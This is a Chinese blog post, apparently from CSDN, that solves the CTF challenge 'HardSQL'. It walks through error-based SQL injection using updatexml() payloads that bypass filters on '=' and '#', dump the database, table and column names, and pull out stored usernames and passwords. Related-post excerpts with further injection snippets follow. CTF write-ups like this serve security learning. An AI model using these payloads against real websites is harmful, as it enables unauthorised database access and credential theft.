SQL报错注入

已于 2023-07-14 11:18:21 修改
阅读量174 收藏 1
点赞数
分类专栏: CTF 文章标签: 网络安全
于 2023-07-14 11:15:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51175992/article/details/131719515
版权

题目:[极客大挑战 2019]HardSQL 1
 

2023-07-14T01:44:29.png


类型:SQL注入

一、判断注入类型

首先判断注入类型是字符型还是数字型
 

2023-07-14T01:58:04.png


通过输入1'发现报错
 

2023-07-14T02:00:06.png


再输入1'#时页面正常
 

2023-07-14T02:01:06.png


在此判断为字符型注入

二、爆破数据库

在通过正常的方式去爆破数据时没有任何的回显,说明此时的常规方法已经没法攻击了,那就尝试报错注入。这里我采用的是updatexml()函数,同时需要注意连接函数的时候可以用^
构造payload爆破库

?username=1&password=1'^updatexml(1,concat(0x5c,database()),1)%23

解释构造的思路,首先updatexml的格式为updatexml(xml_document,xpath_string,new_value),那么一般的构造形式是updatexml(1,concat(0x7e,(sqli_inject),0x7e),1)。concat()函数是将两个字符串连接起来。0x7e与0x5c都是编码,分别为~和/,database()是爆破数据库,由于#被过滤了,利用编码进行绕过,最后成功爆破出数据库名geek

2023-07-14T02:27:23.png

三、爆破数据表

构造payload

?username=1&password=1'^updatexml(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))),1)%23

因为=被过滤了所以利用模糊查询like去解决where的问题,得到表名H4rDsq1

2023-07-14T02:49:55.png

四、爆破字段

?username=1&password=1'^updatexml(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1)%23

得到字段信息:

2023-07-14T02:54:21.png

五、爆破值

?username=1&password=1'^updatexml(1,concat(0x5c,(select(group_concat(id,username,password))from(H4rDsq1))),1)%23

2023-07-14T03:01:24.png

由于extractvalue和updatexml只显示32位字符,需要用right函数去爆破右边

?username=1&password=1'^updatexml(1,concat(0x5c,(select(group_concat(right(password,30)))from(H4rDsq1))),1)%23

2023-07-14T03:05:13.png

总结:SQL注入的题一定要先找是什么类型的,同时找闭合的位置。其次当常规的注入不行时,要想到利用报错注入的方式去实现!

muzzert
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL报错型注入
weixin_44029504的博客
04-16 355
报错型SQL注入 -------------------------------------------------我是小小分隔符---------------------------------------------- 基本原理: 报错型sql注入与SQL联合注入的前三步是一致的(上篇博客),但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则...
SQL注入之报错注入(小白的学习)
lgsyydsa的博客
06-04 383
报错注入适用于无法判断显示位 但页面会根据我们输入错误的SQL语法而报错,所以可以尝试报错注入。作为小白,这里就用ctfhub的题来写点东西,写的不好勿喷。点开题目链接,可以发现只有ID的输入,所以尝试输入数字型和字符型的判断语句,发现?这两个函数都是当第二个参数包含特殊字符时,数据库会报错,并将第二个参数的内容显示在报错内容中,这就是报错注入的原理。结果得到表名flag,news,根据判断,flag八成在flag这张表里。结果发现报错内容中第二个参数中有‘~’,说明方向是对的。别的报错函数一样的道理。
关于sql注入的报错注入函数用法
MzHeader的博客
04-05 713
关于sql注入的报错注入函数用法 1.floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 2.extractvalue() id = 1 and (extractvalue(1, c...
sql注入——报错注入
qq_52843411的博客
08-23 199
我们经过查询可知,cms下一共有八个表,因为显示行数有限,所以我们只能利用limit函数一行一行的查询,limit 0,1表示显示从第0行开始往下数1行,即回显第0行。我们从中可以看出,对我们有用的为cms_users表,我们接下来就是要知道cms_users表的结构,有哪些可用的内容。报错注入,我们首先要找到页面的报错点,报错注入利用页面回显的报错信息来显示我们想要查询的信息。1=2时,回显就出错了,我们就要利用这种前后报错回显不同,来进行我们的报错注入。我们将1=1的位置替换为。
SQL注入---报错注入
zhoutong2323的博客
04-04 669
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
web-报错注入-皮卡丘靶场
07-15
在Web应用中,报错注入通常是由于不安全的SQL查询处理导致的。 在皮卡丘靶场中,我们可以看到几种不同类型的报错注入示例: 1. **Insert(POST请求的报错注入)**: 攻击者利用`POST`请求发送Payload `' and ...
32-32.渗透测试SQL注入基于报错注入(上)
最新发布
05-10
32-32.渗透测试SQL注入基于报错注入(上)
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
最详细的SQL注入之报错注入
qq_62539372的博客
06-23 1万+
最详细的sql注入之报错注入,非常适合小白!!
SQL注入细则
qq_62708558的博客
09-12 2459
最近重新学习了sql注入的一些相关的知识,对于之前的一些初学的时候的细节有了一些补充。 成因问题 sql注入的成因,其本质上是来自于未过滤的用户输入和不正确的sql代码拼接和执行。 环境来源 简单的sql注入会有一个报错的显示,对于这个报错之前一直不太清楚。 其来源是来源于,各个后端语言的数据库错误报错函数。 典型的在php种就是mysql_error()函数。 报错函数会收集所有的数据库错误返回给web服务器。 其原因主要是由于web服务器和数据库服务器处在不同的位置,之间的交互需要
burp爆破mysql_Burpsuite系列 -- 爆破数据库名称
weixin_35796591的博客
02-23 1418
如果不是身上有烟,下雨天我都懒得打伞,如果不是有家人,我活着都嫌烦,如果不是有你,我都不想拥有最后的一点温柔。。。---- 网易云热评靶机环境:win7、phpstudy2018、sqli一、判断注入点1、页面正常访问的情况 2、在id=1后面加上and 1=1和and1=2分别进行测试,发现and1=2返回不正常,说明该处存在注入192.168.1.129/sqli/Less-2/?id=1 a...
SQL注入-报错注入
qq_65240014的博客
08-08 788
本文主要介绍一种结合burpsuite的报错注入sql注入方法
13-sql注入查询方式及报错盲注
qq_56414082的博客
03-29 569
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。Access暴力猜解不出的问题?
sql注入(报错注入
2302_79119987的博客
04-19 1233
实行注入的地方。
SQL注入—报错注入
Forget_liu的博客
06-10 1658
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
sql报错注入基础讲解
qq_44060093的博客
09-20 499
报错注入:构造payload让信息通过错误提示回显出来 应用场景:查询不回显内容,会打印错误信息 php代码: if($row) { echo 'you login name:'.$row['username']'; } else { print_r(mysql_errot()); } 如果能让错误信息中返回数据库的内容,即可实现sql注入 凡是可以让错误信息显示的语句,都能实现报错注入 floor()报错注入的方法 select count(*) from information_schema.ta
基本的四种SQL注入方式
热门推荐
qq_43635212的博客
08-30 1万+
目录联合注入基于错误的注入盲注延时注入 以sqli-labs less-1为例 构造 id=1 and 1=1或者id=1 and 1=2都能够正常查询出结果 构造 id=1’ 报错,说明是字符型注入 联合注入 当查询数据会返回显示界面时可以考虑使用union联合查询的方式 联合查询有两个必要条件: 两张虚拟表具有相同的列数 两张虚拟表对应列的数据类型相同 所以当一个地方可以使用联合查询时基本步骤为:猜测虚拟表列数-》获取数据库名-》获取表名-》获取列名-》获取数据 使用order by猜测列数 可
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4499
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
sql报错注入读取文件
05-22
报错注入是一种常见的注入攻击技术,攻击者在构造SQL查询语句时,故意使用一些错误的语法或者参数,从而导致数据库执行错误,返回错误信息。 如果攻击者成功利用报错注入技术读取了数据库中的敏感信息,比如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

muzzert

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值